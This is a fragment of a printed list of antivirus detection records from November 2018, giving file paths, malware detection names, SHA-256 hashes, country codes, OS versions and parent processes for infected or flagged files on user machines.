  Row(detection=Row(filename='tmp00294ccf', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294ccf', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:48:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291b40', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291b40', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:58:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291790', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291790', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:53:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203402-1bb9e659', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-203402-1BB9E659', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:34:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adobexmp.dll', filepath='D:\\Program Files\\Adobe\\Acrobat 7.0\\Distillr\\AdobeXMP.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='bc58d677ba61f2b2b050ba4434ba1a2921524560e1440df2e3dd1a4ff8176347', metadata=Row(cmdline='\\\\\\/I {AC76BA86-2052-0000-7760-100000000002}', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=73216, timestamp='2018-11-04T12:37:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:01:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='biên bản thi đua cả năm.exe', filepath='G:\\\xa0\\NGUYEN Ổ C\\Biên bản thi đua cả năm.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='c829f0471fd190f70d78fed3b4c56e3306cae681025cefafefe6036d572695f6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:46:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-092033-370f3c26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-092033-370F3C26', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:20:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='b17bc58acf9c9ea26bc7938f90cfe6a29f9e819e065a748e52fcf789239a2c01', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:25:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='simomolo_d4ce4e91.exe', filepath='C:\\Users\\X\\AppData\\Local\\{19072~1\\simomolo_d4ce4e91.exe', filesize=896000, name='HEUR/AGEN.1032303.#M1.#R1'), hash='ef9a8342e29bfca46c53a0bb7cc17986b92a83cc5445687ab12b40c7b9f760f9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=4355024, timestamp='2018-11-04T05:00:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsd4F86.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T03:32:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sqlite.interop.dll', filepath='\\\\?\\D:\\BaiduNetdiskDownload\\2018新视频教程下载地址\\01图片库\\下载到电脑里再运行\\x86\\SQLite.Interop.dll', filesize=1152000, name='W32/Ramnit.CD.#M1.#R1'), hash='ec65a176f1fac723ed7cf81cc10065a9670fd466cb42fda79efb6aa5ab3d892d', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:52:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='serial.exe', filepath='C:\\Program Files\\aBusinessPlus\\SERIAL.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R3807'), hash='ea102d93e8dc6ba57074ba13208d652b38148aff1e605dfe7454f396ed549e3d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:weKJljDs6kmd5\\\\\\/fs.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-04T19:08:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fa49d490bd9e7199fd0fe2bb6485b4fe673edf33708cad126ac40693b00d51d7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FA49D490BD9E7199FD0FE2BB6485B4FE673EDF33708CAD126AC40693B00D51D7', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='fa49d490bd9e7199fd0fe2bb6485b4fe673edf33708cad126ac40693b00d51d7', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:27:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0025201b', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp0025201b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:37:36Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:37:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103955-dd4ba261', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d53ca968\\AVSCAN-20181102-103802-C9AE362C\\AVSCAN-20181102-103955-DD4BA261', filesize=4096000, name='TR/Worm.Gen.#M1.#R1'), hash='6d12e686f4ec82ec0a3334e50ff82aeee4f81ab3622fdf8a7bf5008455301f84', metadata=Row(cmdline=None, country='MZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:40:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='raidreconstructor.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\RAIDReconstructor.exe", filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='273878b53a23dedfba9510ba5363c43b97211bee5d8ebf79ff506ff0691e98a4.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\273878B53A23DEDFBA9510BA5363C43B97211BEE5D8EBF79FF506FF0691E98A4.VIR', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='273878b53a23dedfba9510ba5363c43b97211bee5d8ebf79ff506ff0691e98a4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:42:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113439-309348fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3be4a532\\AVSCAN-20181102-113425-2E2034C6\\AVSCAN-20181102-113439-309348FD', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:34:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL2\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='31b66f92b78e46c69cdbe00a5200df2c65b58f4d27471e77d779b8ccb8c75e72', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1bd9643d50cd60d80bfc219e44dad7f46165582534fb00e134e874a5c3c6766e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1BD9643D50CD60D80BFC219E44DAD7F46165582534FB00E134E874A5C3C6766E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1bd9643d50cd60d80bfc219e44dad7f46165582534fb00e134e874a5c3c6766e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:28:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maps.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\MAPS\\MAPS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1c5eb2619262d5e3ad6cf9bb4b426c77f5fae858e22fa503d330aa1a94b6b8e7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T07:04:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194001-f387acec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-190638-8E042B77\\AVSCAN-20181102-194001-F387ACEC', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:40:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-121212-c639de62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-121202-C4895C84\\AVSCAN-20181102-121212-C639DE62', filesize=768000, name='SPR/Agent.37a43f.#M1.#R1'), hash='37a43fb439032768879b0aef3003edc11371363dc77d6a3670766387fc235272', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T12:15:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='goten.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goten\\Goten.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='4ab1af5900da8b999aba34653bf54bd9498d79ee03b0ef5d37fceb6573b5c908', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103823-0aa29821', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed6475cc\\AVSCAN-20181102-102215-7882B57A\\AVSCAN-20181102-103823-0AA29821', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='repbrows.exe', filepath='D:\\Master\\Visual Basic\\OS\\MSAPPS\\REPOSTRY\\REPBROWS.EXE', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='233663964a4c9e01582817103c0be5f1f73a1730bd9b673d4eafe0eae08acb09', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-02T04:17:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1f8214f374633d3f9c2fe0a2899bec7a8acb0aaaad5ec699ffa8ca30d6f77e43', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\1F8214F374633D3F9C2FE0A2899BEC7A8ACB0AAAAD5EC699FFA8CA30D6F77E43', filesize=64000, name='BDS/Bladabindi.ajtu.#M1.#R1'), hash='1f8214f374633d3f9c2fe0a2899bec7a8acb0aaaad5ec699ffa8ca30d6f77e43', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T12:59:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\04510b796795bac8dc3a80c84e7b64ec\\x86_microsoft-windows-mediaplayer-autoplay_31bf3856ad364e35_6.1.7601.17514_none_1d021a899e3cd8e8\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='0954bc13aa7424b3190bde1b8ef077c6f492f52bb36261b6cd4e2a40b6e190c2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-02T01:40:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194518-2c2a666a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-192951-86ADDA3C\\AVSCAN-20181102-194518-2C2A666A', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:45:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151416-90241e85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-151416-90241E85', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144516-c230a0c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5327ee47\\AVSCAN-20181102-144506-C03E5F25\\AVSCAN-20181102-144516-C230A0C2', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:45:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.163\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.163\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:50:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:38:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:54Z'), dt=datetime.date(2018, 11, 2)),
